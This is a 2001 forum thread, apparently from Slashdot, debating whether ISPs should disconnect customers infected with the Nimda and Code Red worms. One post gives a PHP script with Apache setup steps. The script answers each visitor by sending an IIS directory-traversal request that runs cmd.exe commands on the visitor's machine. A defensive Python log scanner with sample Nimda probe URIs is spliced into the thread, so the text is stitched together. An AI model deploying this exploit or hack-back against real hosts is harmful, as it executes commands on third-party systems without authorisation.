The other day I received an e-mail from a relation of mine which was the SirCam virus in all its glory. Luckily for me I don't use Windows or Outlook for my e-mail. I told them that they had a virus and that they should try sorting it out. They told me they ran their anti-virus and nothing was detected, so they let me know I was wrong (got to love relations ;). It was only when someone else told them the same thing they came back to me telling me despite getting the latest anti-virus update nothing could be detected.
Not being in the same country I decided to find some help documents and e-mailed them the references. It was only after they told me they were still stuck that I realised that most of the documents were oriented towards techies and not towards your average Joe, who considers programming the video a nightmare. In the end I told them to either find someone they knew who was good with computers locally or ask their computer shop if they could resolve the problem.
So here is the problem, what is your average Joe meant to do when all the help is targeted at people who aren't technophobic? Unless this can be addressed infected computers are going to stay infected long after the fix is available.
Forgot to mention that my relations are using a 56K connection, in Europe where being connected costs money by the minute, so when your average OS patch is starting to exceed the 20Mb size, it is likely to make some people wonder whether the update is worth the effort.
Jumpstart the tartan drive.
Finally an ISP that has their act together. This Nimda/Code Red and such business is getting out of hand. Just check how many machines it hit worldwide. However, it would be nice to hear more from Microsoft instead of just have them release patches that don't work.
So when are the authorities going to not only FIRE people for purchasing Msft products, but ARREST & PROSECUTE them for not patching and keeping them worm free and in general from pissing in the public pool? That's what I'd like to see since Msft wants to both 1) publish buggy and patch later 2) market their shiny baubles to the vast computer ignorant laity.
Similarly, there's a certain division of responsibility when someone buys a car - if there are defective parts that might threaten the safety of other drivers (such as tire blowouts), it's the mfg's responsibility to send out recall notices and fix it; but it's also the owner's responsibility to operate the vehicle in a safe manner. What happens in the software licensing world is the mfg assumes *NO* responsibility, even for defects that might endanger data or other people's PC's via a network (info 'superhighway').
It gets really bizarre when you consider that software and all rights remain the property of the authors & publishers, but responsibility for its misdeeds & FU's lands on the poor suckers who fell for the slick ads, don't read or understand EULA's, pirate the stuff, etc. That's like GM leasing cars with defective brakes, and holding the operator responsible for all damages that occur when they fail after pulling onto an off ramp and crashing into a child care facility.
try { do() || do_not(); } catch (JediException err) { yoda(err); }
"...Microsoft will never fix the problem without making sure people have to pay a monthly subscription for their OS..."
Uhhh, MS had a patch out for this quite some time ago. It isn't directly MS's fault (although an argument can be made that they are somewhat to blame). An unpatched and poorly administrated Linux box is just as dangerous as an unpatched and poorly administrated Windows box.
I made a PHP script, by modifying a similar one used for Code Red. First make a "scripts" directory in your web server's root directory. Now put this into a file called "root.exe"

<?php
/* Open a connection to the offender */
/* (the original relied on register_globals for $REMOTE_ADDR and friends; $_SERVER is the equivalent on any PHP release) */
$fp = fsockopen($_SERVER['REMOTE_ADDR'], 80, $en, $es, 5);
/* Check to see if the connection actually opened */
if ($fp)
{
/* URL-encode the message... */
$string = urlencode("net send %COMPUTERNAME% WARNING: The NIMDA worm has been detected on your computer. Please shut down the IIS web server that is currently running and keep it disabled until you can patch and/or re-install your system, or better yet, upgrade to Linux or FreeBSD. Visit http://www.kb.cert.org/vuls/id/111677 for more information.");
/* ...and send it */
fputs ($fp, "GET /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+$string HTTP/1.0\n\n");
/* close the connection (though it probably got closed automatically) */
fclose ($fp);
}
/* for fun and confusion.. */
header ("HTTP/1.0 404");
echo ("<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n");
echo ("<html><head>\n<title>404 Not Found</title>\n</head><body>\n");
echo ("<h1>Not Found</h1>\n");
echo ("The requested URL " . $_SERVER['SCRIPT_NAME'] . " was not found on this server.\n");
echo ("<address>Apache/1.3.20 Server at " . $_SERVER['SERVER_NAME'] . " Port " . $_SERVER['SERVER_PORT'] . "</address>\n");
echo ("</body></html>\n");
/* record who got the warning */
$res = "dirty\r\n";
$log = fopen("/tmp/nimda.log", "a");
fwrite($log, $_SERVER['REMOTE_ADDR'] . " " . date("D, d M Y H:i:s T") . " - " . $res);
fclose($log);
?>

Then (after making sure users can access the file) try going to http://machine/scripts/root.exe. It's going to print out the contents of that file. You want to change that, right?
Well here's how you change that. Edit your httpd.conf file (/etc/httpd.conf, /usr/local/apache/httpd.conf, whatever it is) and put this type in like this:
AddType application/x-httpd-php .php .php3 .exe
Now restart Apache by issuing one of either:
/etc/rc.d/init.d/httpd restart
apachectl restart
That should do it, and you're going to have a logfile of all the people who have been warned in /tmp/nimda.log.
Consider the daffodil. And while you're doing that, I'll be over here, looking through your stuff.
its self defense to some extent
;)
i think at the 'network' level you are free and clear to protect the resources
i don't see that filtering out various ports is any different than the LEC's installing band-pass-filters to shutdown things like "blue-boxes" of yester-year
now, that stated, "content-filtering" is a different matter all together. a port-block is indiscriminate
filtering out content based on some criteria, IMHO, implies some level of responsibility on the part of the ISP -- which is why we don't do it (other than allowing our clients to "opt-out" of banner-ads etc by electing to use a filtering proxy, but it is by no means enforced on the masses.
a well-crafted end user access agreement would go along way to establishing the responsibilities. in the light of this most recent attack, i think i'm going to have ours tuned up so that it includes specific language about temporary disconnects in the case of virii infection
Old age and treachery almost always overcome youth and skill.
is that even patched systems are not clean. Sure, you can patch it, but that doesn't stop the virus. This one is nasty, and patches alone do not fix it. The files on the computer must be cleaned, or infection happens again, and again, and again. I know... We have a box here (and I had all the patches, or at least I thought that I did), and it got infected.... 3 days later, I *think* that it is clean, and patched. So I think shutting down the users is fine.
You will never "find" time for anything. You must "make" it.
I'm a bit old-school; what exactly, pray tell, is the "more recent use of the phrase"? I'm still trying to figure out how tcp/ip could NOT be considered peer-to-peer.
Actually, they've changed the user agreement. It used to state (at least in Columbus, OH) that you couldn't run high bandwidth servers such as games servers, streaming video servers, etc.
Oh well, I guess I'll just switch to DSL when the price comes down another $10 a month.
I'm glad, because during the whole code red fiasco I was sending lists of speakeasy hosts that were infected (that I gathered from my Apache logs) in the hope that they would shut them down.
Now I know the infected hosts will be dealt with one way or another, and I can stop taking the time sending all those emails and actually do something productive.
NT
It's very easy to stop Code Red - turn off the computer, call the ISP, and you are online again.
Lars.
(It's clear that they haven't completely shut down the ports, since I'm still able to connect to my server, but I've only got errors from a few unique IP addresses today. There's no way that many people could have cleaned up their own systems since yesterday...)
Your Servant, B. Baggins
How does that jibe with the following, from http://help.broadband.att.com/legal/violations.jsp ?
Interestingly, I can find no such clause forbidding redistribution in the leasing agreement that you quote (only a clause prohibiting *selling* services). But clearly they believe that running any kind of server is a violation. From http://help.broadband.att.com/faq.jsp?content_id=416&category_id=34:
That seems pretty clear to me! Perhaps the leasing agreement isn't the only agreement you're subject to (I notice they also have links to an "acceptable use policy", but they seem not to be accessible by non-AT&T users). In any case, I wouldn't want to have to be in the position of having to argue the point with them after they'd blocked port 80. If you want to run servers, go elsewhere if you have the choice. If that choice isn't exercised, it may eventually disappear....
--J. Bruce Fields
I don't understand why @home won't reference a database of compromised machines, reroute these customers to a master web server, and display a page saying "YOUR WEB SERVER HAS BEEN COMPROMISED". Then you make the patches available on that server via a link. That way the end user is made aware that instant. No call in costing the ISP money. The end user now has the responsibility to either look at the pretty blinking red screen or patch their shite. Seems pretty easy to me. It will take a couple of engineers maybe a day's work... but then you have to ask what is the cost of the degraded service tech support calls all day from thousands of disgruntled customers?
Just some food for thought
I couldn't fail to disagree with you any less.
People have commented that without an Internet connection, the problem will be hard to fix. Why? Because Microsoft requires infected and at-risk systems be on the Internet to download patches. If Microsoft had done the respectable thing and mailed out patch CDs to registered users (and maybe even given them away at computer stores), much of this could have been avoided.
Speakeasy is going to start cutting people off the 23rd. I have no problem with them doing so. Maybe I should, but I feel more like applauding. Here is the message I received from them, which has some useful URLs. As a result it is long. And, oops, the lameness filter caught it. I will prune this down to the rationale and drop the urls and try again.
My take is that a couple days notice, with resources, is an attempt at being reasonable.
Dear Speakeasy Members,
Over the last 3 months, we have been battling it out with the "Code Red" worm. Just as we were beginning to believe the worst was behind us, we have now learned that there is yet another hostile bit of rogue data coursing its way around the Internet.
This new so-called "Nimda" worm, unlike its Code Red predecessor, affects not only Windows 2000/NT/XP running IIS, but Windows 95/98/ME as well. It goes without saying that the damage potential for this worm is exponentially greater than the Code Red worm. It is for this reason we urge you to apply the proper fix to your machines ASAP -- if you have not done so already.
Actually, no... The bandwidth belongs to those who setup the backbones and the connections and the routers, etc. The end user *leases* bandwidth from the ISP to get online. Just like a lease on a car, if you screw up that car or otherwise, and it cannot be returned at the end of the lease, you'll have to purchase it outright. Since no one who gets a standard consumer-level ISP account can usually afford to purchase huge pipelines of bandwidth, this is the only other precaution they could take.
I say more ISPs should start shutting down those who are affected until they patch, and if they find subnets full of affected machines that aren't being patched or shut down, block those packets from entering their network.
Human nature is the same everywhere; the modes only are different. -- Earl of Chesterfield
Try changing your zip code to the same city as some of us who are telling you that we're allowed to run servers - the help pages change based on where your service is coming from.
Try 32225 - Jacksonville, Florida. Formerly MediaOne Roadrunner. Then go look at the service agreements.
We're allowed to run servers, we just can't have AT&T support them.
This space for rent. Call 1-800-STEAK4U
I mean as opposed to peer to peer software like Gnutella or Napster. TCP/IP IS peer to peer, like I said.
No, I don't want a free iPod
And I've tried to get through to them, but no one there is willing to answer the phone. (I have waited over 3 hours on the phone with them in one sitting)
I can imagine that all those that had their service cut off probably can't get it turned on even after they fix their boxes. DSL.Net seems to think 'customer service' is defined by forcing your customers to listen to unbearable hold music for 3 straight hours, still not answering the phone, and not returning any calls left on their voice mail.
I agree with the ISP. Infected hosts can only cause problems. It's not like the info for how to patch hasn't been on every news station world wide.
Also this assumption that people have no idea they're running IIS is false. You have to install 2000 Server or NT Server to get IIS installed by default, and even then it asks you! If you have chosen to load 2000 Server or NT Server odds are you should be savvy enough to patch them.
I can see home users not knowing enough about computers to take the steps to protect themselves. Personally I think that Internet usage should be licensed and anyone unwilling or unable to qualify for the license should be relegated to AOL. Anyone claiming this view is elitist is obviously a candidate for such a fate.
And as far as the companies that post enormously inflated figures on how much these various E-Mail worms will cost them, I say they should go to their network security people and their CIO and ask them hard questions about why the necessary steps were not taken to prevent the outbreak inside the company in the first place. The exploit that Code Red used, for instance, had a patch out for ages before the worm start spreading. Of course, the reason the infrastructure monkeys don't do it is because a lot of them are idiots and the ones who aren't are so overwhelmed that they can barely keep up with other work demands. The CIO makes the decisions on how much staff is necessary to keep the networks not only running smoothly but safely and securely too and if he's not doing his job well, his bonus and possibly his job should be impacted.
I'm trying to teach myself to set people on fire with my mind... Is it hot in here?
99.9% -- seems a little low to me
________________________________________________
...what do you assume the shelf life of a vanilla Linux/FreeBSD install will be?
Much as I enjoy the painful auto-fellation, put aside the inane OS chest thumping. A savvy user who stays on top of their patches and is security-minded will always be safer than a relatively clueless home user.
Easy does it!
If you install a patch, it should STAY installed. Yet, with the way MS products are cobbled together, when you add a new patch for some other part of the system, you have to re-apply the old patch, IN SOME CASES.
You have to be Kreskin to grok what to do.
The ISP could block all traffic, but redirect all http traffic to a page which explains the situation and has one link to download a virus cleaner.
:))
Oh, sorry. Also a second link with all the patches for his OS.
Hmm. maybe also an option to have Nessus attack his computer
Privacy is terrorism.
If you leave the phone off the hook long enough without dialing, the central office will drop the circuit and send an alarm signal back. If you busy your line long enough, the phone company will eventually disconnect the circuit. In both cases they rightly view the condition as a fault and free system resources for other clients. ISP's are acting in a similar manner, the important criterion being user intent. The provider makes a judgement call that the circuit isn't being used in a way its owner intended and disables it until a fix is in place. Hang up the phone, run the patch.
just wanted to throw in my 2c... one of my boxes got infected by one of these recent worms and i was at work that whole day so it was just spamming everyone...
but i imagine that my box probably infected others, and that's just not acceptable.
anything these home dsl/cable providers can do which limits the spread of these virii is a Good Thing (TM). except for blocking port 80 permanently on their networks of course... =)
--w
E V E R Y T H I N G I W R I T E I S F A L S E
The explanation from DSL.net was that the worm was saturating the bandwidth, not that I had been cut off. My internet access was spotty or non-existent from last Thursday at 6pm EST until around 2pm EST on Wednesday. DSL.net blamed this on a backup generator failure in NYC, then unspecified hardware failures, and then the Nimda worm.
I know that the comparison goes only that far, but if the gas utility company gets a few reports that there is a gas odor floating around your house, they'll immediately shut down your gas meter. Then, maybe, they'll try to call you. More likely, they'll wait for you to call.
This is considered as a commendable attitude. Safety first. The utility doesn't want other customers to have problems because you are clueless about your gas heater's pilot light.
The real question is: do we want utility companies to refuse to sell us gas until we have passed a HVAC professional certification and are demonstrably competent fixing all gas-burning appliance problems? Of course not. So by default we accept being considered morons and being shut off at the first alert.
Similarly, should ISP mandate system administration training for their $14.99 a month customers? Nope, they shut them off.
And honestly, I prefer to be assumed incompetent rather than to have countless organizations monitor my skills, training and job history.
--
Mad science! Robots! Underwear! Cute girls! Full comic online! http://www.girlgeniusonline.com/
My company runs IIS (yuck) and DSL.net shut off my connection when we got Code Red several weeks ago. I blocked off port 80 in our router and they agreed to restore our connection so I could download the patches (which I had been trying to do for the past 2 days with severely limited bandwidth thanks to Code Red).
:-) I've finally convinced our head admin to start using Linux instead, although he's switching due to Microsoft's stringent licensing contracts (XP) instead of for security reasons.
Funny how my Apache server was just fine.
"With sufficient thrust, pigs fly just fine." -- RFC 1925
The IIS exploit that Nimda used was reported in October of 2000 in MS00-078... Web Server Folder Traversal.
But it references actually having already been patched by MS00-057... File Permission Canonization which was released in August of 2000.
Both of these have been included in various other hotfixes moving forward, including rollup hotfixes thrown together to battle Code Red.
The other IIS exploit was really just to use holes which had been punched in from Code Red. This means that if CR had infected a machine, that machine would need to have been properly cleaned up.
The other vector this virus used was a problem with invalid interpretation of Mime headers, reported in MS01-020 in March of 2001. This was corrected with SP2 of both IE5.01 and IE5.5, as well as IE6.0.
Yes these exploits had been patched many months ago.
No you did not have to subscribe to anything to obtain these patches, they are all available for Free off of Microsoft's website.
http://www.microsoft.com/security
/. tends to have difficulty representing the truth. Personally I blame it on a shortage of anti-depressant medications in Michigan.
Speakeasy is doing the same thing. I got this yesterday.
The effects of this worm are detrimental to all and we'd like to give each member a chance to secure their machines. However, after 9/23/01, Speakeasy's Abuse Team will be freezing the DSL circuit hooked to any machine infected with the worm. We apologize for the inconvenience of this, but it is imperative that we ensure our network is not assisting in the propagation of this, or any, worm. All of us are part of a larger community, and it really isn't cool to infect your neighbors.
-Hash_browns
scattered covered smothered chunked
Being the conscientious sort I went to the Symantec site to see what they had for information on Nimda. I did this Tuesday afternoon. Wednesday morning we were asked to update our virus definitions and shortly thereafter my AV detected Nimda on my Windoze box. When I looked at the files that were infected, they were in my browser cache from my visit to the sarc webpage the afternoon before. I picked up the readme.exe file and the other .eml and html files that this virus spreads.
;) I suspect that they've since cleaned it up, but it shows how easy it can be for even people that know better to get caught offguard sometimes. I spent yesterday watching my Apache logs fill up as the waves of machines pounded against my Linux box. Kinda like "Night of the Living Dead". As if that wasn't enough, the "Virtual Post Card for You" hoax made the rounds this morning (good timing though).
:)
In a case like this it was like going to Dr. Kevorkian for treatment
While my daughter is away at the university, I have Symantec products protecting her Win2k machine in my absence. The school is requiring students to use some MS products for school so it's a necessary evil for now. None of the Comp Sci majors there (freshmen) knows how to use Linux yet. I've been handing out Mandrake and RedHat as well as playing tech support for them while they improve themselves.
You must be the change you wish to see in the world - Ghandi
I don't see what the fuss is all about. I patched my system when prompted to, I updated my Norton antivirus when prompted to, I went on some websites which had the virus, it detected it, I received e-mails with it, it detected it.
:)
I'm not a rocket scientist, I've acted like any Net user should do; patching and antivirus are something common in the windows world. Bitch as much as you want, if you've done your homework properly, chances are you didn't get affected by this. Of COURSE some will (people that got it before, let's say, the Norton update was available), but if everybody had done his job right, the threat would have been contained and not as big as it is right now.
Paying for norton antivirus? well last time I checked it was about 30$ for an OEM copy, that's nothing compared to paying 40$ for a C00l K-RaD cooler or overpriced pentium IV is it? If you're able to spend 1000$ on a box, spending 30$ for protecting it is an investment.
What I find unacceptable is people that, one week after code red was announced, were still infected and probing my servers. That's irresponsible, and I agree with shutting them down until they fix the problem. Please don't bullshit with freedom and similar crap related issues, if your freedom means slowing down or crashing other people's net experience, it's called BEING SELF-CENTERED and irresponsible. ISP have a responsibility to ensure that the maximum of their userbase aren't affected by any crisis, a complete shutdown may be a bit drastic, but if it's the way to educate people (since it seems that people didn't learn from code red) well, I'm all for it.
I guess I'll be modded as a troll or flamebait, but I do think I'm making sense
--- Metamoderating abusive downgraders since my 300th post.
actually even better than completely cutting off a users net access would be limiting their access and rerouting all HTTP requests a site which explains that they have the virus and provides complete directions on how to remove the virus etc...
then once they have fixed the virus they could perhaps go back to that site, click a button which would somehow verify that they are patched up, and then their connection would be restored...
this limits the damage they can do to others, and limits the time these DSL/cable provider CSRs need to spend dealing with stupid users...
--w
E V E R Y T H I N G I W R I T E I S F A L S E
I have seen in the past web servers that will send the request back to the client if that page is not found. For example, if you send a bogus request to thttpd it just sends the request string back to you and says it could not be found. This causes all hell to break loose with IDS systems, so it appears that the attempted victim is an attacker even though it is patched (or more likely not vulnerable at all). If they just start shutting down people's connections they could be killing valid users, granted this would probably be a small percentage of users though.
Just a passing thought.
Windows Update will NOT fix NT4 or IIS 4 security problems. I know, I tried it on our intranet server. There were no security updates for IIS. I had to dig for the SRP and install it. Naturally, after the reboot our version of Crystal Reports didn't work and had to be upgraded.
Gamingmuseum.com: Give your 3D accelerator a rest.
What amazes me is that a copy of IIS purchased in July 2001 still needs to be patched with a patch released in Oct 2000.... This is from personal experience BTW. Hello? What's the big deal of burning the CD with a patched system (say updating it quarterly)? Would it add 5 cents to the total cost?
I've been stopping Nimda attacks at the firewall by scanning Apache logs and then adding the offenders to ipchains - which has the nice feature that I can generate a clean list of attackers with "ipchains -L input." In a few cases, I've gone to their Websites and sent messages to the admins about their problem. But for the most part I can't see how to get e-mail addresses for the typical DSL customer (and the majority of machines infected seem to be DSL customers - which makes sense, amateurs who don't know not to trust Microsoft). It might be a privacy issue to provide e-mail, even phone numbers publicly in a form to be looked up by IP for anyone with a static IP, but it would sure help for those of us who'd like to take the time to warn the lusers to fix their messes, and maybe avoid the sort of arbitrary shutdown at issue here. For that matter, it wouldn't be a huge project for providers to set up some sort of a blind e-mail redirector (with good spam filtering) to the customer for each of the static IPs provided.
"with their freedom lost all virtue lose" - Milton
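The log-scanning approach described in the post above, written out as an added example (not code from the thread or from any project it mentions): parse Apache combined-format lines, count Nimda-style probe requests per client (keyed on the `/winnt/system32/` path the worm requests), and emit the ipchains add and remove rules as text instead of running them. The sample log lines, the `threshold` parameter and the IPv4 check before anything reaches a shell command are my own assumptions.

```python
"""Scan Apache access-log lines for Nimda-style IIS probes and build ipchains rules."""
import ipaddress
import re
from collections import defaultdict

# Apache "combined" format: client ident user [time] "request" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)'
)

# Path component the worm requests when probing for an unpatched IIS host.
PROBE_RE = re.compile(r'/winnt/system32/', re.IGNORECASE)

# Constructed sample log; the addresses are private-range placeholders.
SAMPLE_LOG = """\
10.0.0.5 - - [19/Sep/2001:10:12:01 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 276 "-" "-"
10.0.0.5 - - [19/Sep/2001:10:12:01 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 276 "-" "-"
10.0.0.5 - - [19/Sep/2001:10:12:02 -0700] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 276 "-" "-"
192.168.1.20 - - [19/Sep/2001:10:13:15 -0700] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/4.0"
172.16.3.9 - - [19/Sep/2001:10:14:40 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 276 "-" "-"
not a log line at all
"""


def parse_line(line):
    """Return the named fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_ipv4(text):
    """Only a plain dotted-quad is allowed into a firewall command line."""
    try:
        return ipaddress.ip_address(text).version == 4
    except ValueError:
        return False


def find_probers(lines, threshold=2):
    """Map client IP -> number of probe requests, keeping clients at or above threshold.

    The worm fires a burst of probe URIs at each target, so requiring more than
    one hit per source drops stray single hits. Unparseable lines and clients
    that are not IPv4 literals (e.g. resolved hostnames) are skipped.
    """
    counts = defaultdict(int)
    for line in lines:
        rec = parse_line(line)
        if rec is None or not is_ipv4(rec["client"]):
            continue
        if PROBE_RE.search(rec["uri"]):
            counts[rec["client"]] += 1
    return {ip: n for ip, n in counts.items() if n >= threshold}


def ipchains_rules(probers):
    """Build the DENY rules and a matching removal script (dry run: nothing is executed)."""
    ips = sorted(probers, key=lambda ip: ipaddress.ip_address(ip))
    add = [f"/sbin/ipchains -I input -s {ip} -j DENY -l" for ip in ips]
    remove = ["#!/bin/sh"] + [f"/sbin/ipchains -D input -s {ip} -j DENY -l" for ip in ips]
    return add, remove


if __name__ == "__main__":
    hits = find_probers(SAMPLE_LOG.splitlines())
    add_rules, remove_script = ipchains_rules(hits)
    print("\n".join(add_rules))
    print("\n".join(remove_script))
```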
Finally! Someone with half a brain is regulating these idiots. This is not unfair; as a matter of fact, similar things happen in real life. For example: fire inspections happen once a year at commercial buildings. If your fire systems are not up to code or malfunctioning, you get shut down. If your car is belching pollutants, has bad brakes, or bad tires, you fail inspection and get off the road. It's for the protection of society! If you're too stupid to patch your IIS box, too bad!
-ted
My ISP has always had transparent proxy servers for outgoing requests, so as soon as I heard about this and noticed my webserver logs growing several orders of magnitude faster than they normally do, I politely asked my ISP if they could get those transparent proxies dropping nimda-type requests.
Uncharacteristically, they actually paid some attention, and gave me a nice polite reply and a few days later they had gone several steps further. Not only did they block the nimda probes, they also blocked the IE exploit and incoming nimda probes from outside. They also put monitoring software on the proxies so that users who send out a certain amount of nimda probes will automagically get their account suspended and a letter dispatched explaining why.
I'm happy with what they did. It's made those transparent proxies a whole lot more responsive since they aren't constantly forwarding stupid probes from clueless 'admins' who are actually just users who accidentally turned on IIS. All home ISPs should do this - carefully, of course - in order to keep known worms under reasonable control.
From the Slashdot story, "... Microsoft will never fix the problem without making sure people have to pay a monthly subscription for their OS."
I think this is exactly the problem. That's why Windows 2000 was reportedly shipped with 63,000 action items still unfinished. Microsoft knows that, once they deliver one good operating system, most people will never buy another. They want to make sure that they never finish the job.
Forcing users to pay for subscriptions would allow Microsoft to make money every year even if it did no more work on the OS. That seems to be the goal: money for nothing.
Microsoft is a very adversarial company, in my opinion. They are not good citizens.
A good partial resolution of the US DOJ vs. Microsoft antitrust case would be to prohibit secret file formats. Then there could be competition again. At present, if a big customer upgrades to a new version of Microsoft Office and sends out files incompatible with previous versions, all people who receive the files are forced to upgrade. Companies don't want to go to a good customer and ask them to re-send a document in a former format.
What Should be the Response to Violence?
Bush's education improvements were
If memory serves me right, AT&T Broadband has a "no servers" clause in their TOS/AUP. I definitely know that @Home has a "no servers" clause. So did Flashcom when they were around.
There are DSL ISPs that don't care about servers on their customer accounts. However, with the advent of Nimda I suspect they will be very, very scarce soon.
An ISP has the right to enforce its policy. It's part of the cost of doing business with them. I'm sure I will be modded down about this, but it's reality. ISPs have it tough now. They are going broke left and right. Nimda might break some of them. Do you want the Incumbent Local Exchange Carriers running EVERYTHING on the Internet? It could happen.
Knowledge is power. Knowledge shared is power multiplied.
Hey moron, MANY people use NT/2K at home and not for only the asinine reasons that your 50cc brain could come up with. Both are much more stable than their 9x/ME brethren (you can grok that, eh Lyenux boi?) and offer much improved multitasking over 9x/ME also. Try working from home, dialed in to an AIX box from win98...I would get tired of having to call lansupport at work and continuously ask them to renew my lease/access code, as my session hung or crashed again (as it is, we are issued new ones every 5 mins, so I could just wait 5 mins..gotta love datacenter environments). I could go on pounding you with a clue-by-four (there's plenty more examples: compiling quake levels in a map editor, photoshop/web design, asp development...why am I wasting my breath on you?) but I think I'll just let this one soak in. For the record I obviously like W2k, but I use one of the *BSD's. You've got a lot of learning to do, kid.
Under capitalism man exploits man. Under communism it's the other way around.
I was browsing around on freshmeat yesterday and found a utility to e-mail infected hosts - it's called codeblue and the URL is here. It scans apache logs and e-mails the infected host with the info.
I completely agree with the tactic of shutting down infected users. They are causing harm to other users and thus are not a good part of the community -- remove them from the community.
I DO NOT support the blocking of ports. I might support the temporary blocking of ports for individual users for a limited time, provided they are notified very clearly, but I use my DSL line for legitimate web page serving and do so responsibly -- with Apache.
If a user does not know how to control their software in their lives, then the software will control their lives. Be in control, or they are out of control.
I thank the ISPs who would support such measures, so long as they do so fairly and make it possible for a user to rejoin the network after they have fixed their problem.
First, I agree completely with the decision to block these users. Unfortunately the Swiss Cablecom is not bold enough to do the same.
One thing makes me wonder though: don't they have postal addresses for their users? I mean, do they give out accounts without verifying the identity and location of customers? That would be a grave risk in itself! And I do expect a provider to inform a customer that has been infected and cut off by snail mail a.s.a.p.
Most ACs are not even worth the keystrokes to insult them. Be generically insulted and ignored otherwise.
As does Verizon's... who is also blocking port 80 and 25 now. Bastards. Considering I don't have to worry about broadband this no longer affects me, but it is the thought that counts.
Something that often gets lost in the furor over one of these outbreaks is what the core of the problem is. IP was designed around the end-to-end principle: dumb interior nodes (routers) and smart end nodes (hosts). This architecture replaced the notion of store-and-forward networks with intelligent network layers (application layer gateways). Firewalls, NATs, and stateful inspection boxes (middle boxes) are nothing more than a return to the bad old days of ALGs and their direct implication: strangulation of new services because network-wide flag days are impossible.
Anybody who doesn't understand this ought to take some time to read Elliot Lear's _Foglamps_ piece, as well as listen to some of Steve Deering's rants on network transparency (as presented at the last IETF plenary). To make a long story short, IP is a *very* poorly thought out architecture for an intelligent network, and trying to graft it back onto the current Internet is very, very ugly. Routers fundamentally know about forwarding packets and maybe some stuff about packet classification/scheduling. They don't know squat about the attack du jour, and anybody who tries to tell you otherwise is trying to sell you crack.
So what does that have to do with CmdrTaco's "kill them all, let the ISP sort them out" call? The problem is that disabling network functionality throws the new-Internet-services baby out with the bath water. How do you plan to run VoIP services when both users are behind NATs? How do you not kill new services such as, oh say, Napster, IM, etc, etc when the ISP's first response to a security meltdown is to shut off everything except "known applications"? Why would an ISP in their right mind ever lift those restrictions, since it's obvious that it is in their best interest (= keep their NOC monkeys from endless late nights) to kill first, ask questions later?
The _real_ problem here is the stupid idea that the great unwashed masses are capable of being their own sysadmins. This is silly on its face, but that is the state of the emperor's clothes today. What we really need is for service providers to step up to the job that is sorely lacking right now: a system manager service for people who don't understand, or can't be bothered to want, to do it for themselves.
Sounds crazy? Well, consider the alternatives: strangulation of the net by fascist network admins whose tools are necessarily ham-fisted, or death by thousands of script kiddies providing a 21st century tragedy of the commons.
True. But it shows a particular attitude, doesn't it? Ship on schedule, not when the product is finished.
My DSL ISP just filtered all incoming HTTP traffic to all their customers. My personal WWW server became inaccessible. My Linux box is NOT infected and I do not see why I have to suffer because they are trying to protect some stupid Windows users. And this is a "business" DSL account!
They want to "prove" that TCP/IP is a bad/insecure protocol because they didn't invent it, maybe even the reason for all the "worm troubles" everyone is having.
They will steal some new technology that they will claim that they have "invented" and lobby for its acceptance for use in its place, but of course it will cost other manufacturers dearly to license the product.
I only hope that the same thing happens as with JScript and the "embrace and extend" tactic they tried with Java.
Women and alcohol are good separately, but mix 'em and they turn you into a dumbass
They can please the fifty percent of the people who want it when it was promised, or they can please the other fifty percent who want it 'when it's done.' Or they can pull an Ion STORM and live off of the hype for four full years, then sink within six months.
Vintage computer games and RPG books available. Email me if you're interested.
Does anyone out there know if these two viruses can affect Microsoft Personal Web Server? I have it running in the background of my Windows box and it just hit me: I'm, in essence, running a Microsoft server. hmmm.
And, once again, the lameness filter blocks useful information from being posted, while down in level -1 the trolls continue unabated.
:-)
I spent fifteen minutes one day trying to figure out how to get the lameness filter to accept my post, and eventually just blew it off and didn't post.
I'd send Taco a bill for my time, if I wasn't worried he'd send me one for all the emails I've sent bitching about the moderation system.
Why does the mainstream insist on running old software that continues to have holes exploited?
I'm not talking about microsoft products only.
Why do people do an install of RedHat or Mandrake from CD? This is !@#% stupid. Maybe I am biased, being a user of Debian.. but doing an upgrade every few days of ALL my software makes me feel a little more secure..
Sure, the latest/greatest program can have a bug too.. but there is less chance that I have a hole than the chance that Mr. Redhat or Mr. NT Wormstation has a hole. If your software is old enough to be burned on a CD, it is too old.
Note this is not saying that all old software is bad; some old software is quite secure and stable.. but the easiest way to keep on top of things is to run an OS with an apt/ports system.
Well, this is good for workstations. What about servers? Upgrade often, but if you run Debian.. don't use sid.. use testing (currently woody), usually still very secure but also has extra stability and maybe even security.
When I got my DSL line, I received a big hurkin box full of stuff. (Including a very nice Intel NIC.)
If they are concerned about infected servers, they should work a deal with Linksys or some other manufacturer and ship a firewall box with each install.
They are very simple to set up and keep out the probes to all the ports that Windows leaves open. If people want to run web servers, they have to specifically enable specific ports.
It won't stop the e-mail viruses, but it is a start...
"Trademarks are the heraldry of the new feudalism."
How precisely is this an exploit?
I am running a couple of web servers on my Cablevision cable connection. I run both Apache(linux) and IIS(windows). Cablevision blocked inbound port 80 during the Code Red fiasco because other people's boxes were flooding the network. I'm not a pirate, and my boxes are patched...I say shut off the dumb-asses and leave me alone.
-ted
We are clearly in a time when we are increasingly vulnerable. If we are not capable of stopping these types of attacks in their tracks, we can count on remaining vulnerable not just to the mafia boys of the world, but to nations and organizations who are deadly intent on causing as much destruction as possible.
1) ISPs should allow any and all traffic - they're just service providers. Great idea - and the highway system (ok, let's say toll roads) should let folks drive down them with an M1 Abrams tank. Armed. Fact is, service providers, for both idealistic ethical and pragmatic financial reasons, must choose the greater good of the majority of users - not the imagined rights of any individual to screw it up for everyone else.
2) Cutting users off from the Internet seems a bit harsh. Bull. Having suffered through the Code Red degradation of service, I can guarantee that it is a trivial harshness that is necessary. I turned over my scan lists to @home and they politely replied that they were "notifying" the offenders. If these guys were in charge of quarantining an Ebola outbreak we'd all be barfing blood. Blanket port blocking, on the other hand, wrongly damages and restricts responsible users.
